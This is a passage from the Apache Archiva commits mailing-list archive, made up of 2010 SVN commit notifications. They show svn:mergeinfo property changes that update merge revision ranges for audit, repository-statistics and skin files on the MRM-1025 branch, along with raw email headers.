/archiva/branches/archiva-search-improvements/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/RepositoryPathTranslator.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/RepositoryPathTranslator.java:699795-705848 -/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/RepositoryPathTranslator.java:825850-899477 +/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/RepositoryPathTranslator.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/StorageMetadataResolver.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/StorageMetadataResolver.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/StorageMetadataResolver.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/StorageMetadataResolver.java:699795-705848 -/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/StorageMetadataResolver.java:825850-882383,885006-899477 +/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/StorageMetadataResolver.java:825850-882383,885006-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/ ------------------------------------------------------------------------------ --- svn:mergeinfo (added) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -0,0 +1,6 @@ +/archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit:721945-723577 +/archiva/branches/MRM-541/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit:686983-687034 +/archiva/branches/archiva-search-improvements/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit:723609-726925 +/archiva/branches/archiva-struts2/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit:699795-705848 +/archiva/tags/archiva-1.3/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit:898632 +/archiva/trunk/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit:825850-899477,899478-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditEventFactory.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -1,5 +1,6 @@ -/archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsFactory.java:721945-723577 -/archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsFactory.java:686983-687034 -/archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsFactory.java:723609-726925 -/archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsFactory.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsFactory.java:825850-899477 +/archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditEventFactory.java:721945-723577 +/archiva/branches/MRM-541/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditEventFactory.java:686983-687034 +/archiva/branches/archiva-search-improvements/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditEventFactory.java:723609-726925 +/archiva/branches/archiva-struts2/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditEventFactory.java:699795-705848 +/archiva/tags/archiva-1.3/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditEventFactory.java:898632 +/archiva/trunk/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditEventFactory.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditManager.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -1,5 +1,6 @@ -/archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManager.java:721945-723577 -/archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManager.java:686983-687034 -/archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManager.java:723609-726925 -/archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManager.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManager.java:825850-899477 +/archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditManager.java:721945-723577 +/archiva/branches/MRM-541/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditManager.java:686983-687034 +/archiva/branches/archiva-search-improvements/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditManager.java:723609-726925 +/archiva/branches/archiva-struts2/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditManager.java:699795-705848 +/archiva/tags/archiva-1.3/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditManager.java:898632 +/archiva/trunk/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditManager.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/DefaultAuditManager.java ------------------------------------------------------------------------------ --- svn:mergeinfo (added) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -0,0 +1,6 @@ +/archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/DefaultAuditManager.java:721945-723577 +/archiva/branches/MRM-541/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/DefaultAuditManager.java:686983-687034 +/archiva/branches/archiva-search-improvements/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/DefaultAuditManager.java:723609-726925 +/archiva/branches/archiva-struts2/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/DefaultAuditManager.java:699795-705848 +/archiva/tags/archiva-1.3/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/DefaultAuditManager.java:898632 +/archiva/trunk/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/DefaultAuditManager.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/MetadataAuditListener.java ------------------------------------------------------------------------------ --- svn:mergeinfo (added) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -0,0 +1,6 @@ +/archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/MetadataAuditListener.java:721945-723577 +/archiva/branches/MRM-541/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/MetadataAuditListener.java:686983-687034 +/archiva/branches/archiva-search-improvements/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/MetadataAuditListener.java:723609-726925 +/archiva/branches/archiva-struts2/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/MetadataAuditListener.java:699795-705848 +/archiva/tags/archiva-1.3/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/MetadataAuditListener.java:898632 +/archiva/trunk/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/MetadataAuditListener.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/ ------------------------------------------------------------------------------ --- svn:mergeinfo (added) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -0,0 +1,6 @@ +/archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit:721945-723577 +/archiva/branches/MRM-541/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit:686983-687034 +/archiva/branches/archiva-search-improvements/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit:723609-726925 +/archiva/branches/archiva-struts2/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit:699795-705848 +/archiva/tags/archiva-1.3/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit:898632 +/archiva/trunk/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit:825850-899477,899478-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -1,5 +1,6 @@ -/archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManagerTest.java:721945-723577 -/archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManagerTest.java:686983-687034 -/archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManagerTest.java:723609-726925 -/archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManagerTest.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManagerTest.java:825850-899477 +/archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java:721945-723577 +/archiva/branches/MRM-541/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java:686983-687034 +/archiva/branches/archiva-search-improvements/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java:723609-726925 +/archiva/branches/archiva-struts2/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java:699795-705848 +/archiva/tags/archiva-1.3/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java:898632 +/archiva/trunk/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/DummyLifecycleBindingsInjector.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/DummyLifecycleBindingsInjector.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/DummyLifecycleBindingsInjector.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/DummyLifecycleBindingsInjector.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/DummyLifecycleBindingsInjector.java:825850-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/DummyLifecycleBindingsInjector.java:825850-909070 From [email protected] Fri Feb 12 01:43:52 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41610 invoked from network); 12 Feb 2010 01:43:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2010 01:43:52 -0000 Received: (qmail 43176 invoked by uid 500); 12 Feb 2010 01:43:52 -0000 Delivered-To: [email protected] Received: (qmail 43127 invoked by uid 500); 12 Feb 2010 01:43:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43118 invoked by uid 99); 12 Feb 2010 01:43:51 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 01:43:51 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 01:43:49 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id C8EBC2388A33; Fri, 12 Feb 2010 01:43:27 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909202 [4/4] - in /archiva/branches/MRM-1025: ./ archiva-docs/src/site/apt/adminguide/ archiva-docs/src/site/resources/images/tour/ archiva-docs/src/site/xdoc/tour/ archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/ma... Date: Fri, 12 Feb 2010 01:43:25 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsFactory.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsFactory.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsFactory.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsFactory.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsFactory.java:825850-899477 +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsFactory.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManager.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManager.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManager.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManager.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManager.java:825850-899477 +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManager.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/test:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/test:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/test:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/test/java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/test/java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/test/java:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/test/java/org:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/test/java/org:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/test/java/org:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/test/java/org/apache:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/test/java/org/apache:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/test/java/org/apache:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManagerTest.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManagerTest.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManagerTest.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManagerTest.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManagerTest.java:825850-899477 +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManagerTest.java:825850-909070 Propchange: archiva/branches/MRM-1025/skin/src/main/resources/META-INF/maven/site.vm ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -0,0 +1 @@ +/archiva/trunk/skin/src/main/resources/META-INF/maven/site.vm:899478-909070 Propchange: archiva/branches/MRM-1025/skin/src/main/resources/css/maven-base.css ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -0,0 +1 @@ +/archiva/trunk/skin/src/main/resources/css/maven-base.css:899478-909070 Propchange: archiva/branches/MRM-1025/skin/src/main/resources/css/print.css ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -0,0 +1 @@ +/archiva/trunk/skin/src/main/resources/css/print.css:899478-909070 Propchange: archiva/branches/MRM-1025/skin/src/main/resources/images/logos/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -0,0 +1 @@ +/archiva/trunk/skin/src/main/resources/images/logos:899478-909070 From [email protected] Fri Feb 12 01:43:57 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41686 invoked from network); 12 Feb 2010 01:43:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2010 01:43:57 -0000 Received: (qmail 43289 invoked by uid 500); 12 Feb 2010 01:43:56 -0000 Delivered-To: [email protected] Received: (qmail 43226 invoked by uid 500); 12 Feb 2010 01:43:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43217 invoked by uid 99); 12 Feb 2010 01:43:56 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 01:43:56 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 01:43:50 +0000 Received: by eris.apache.org (Postfix, from userid 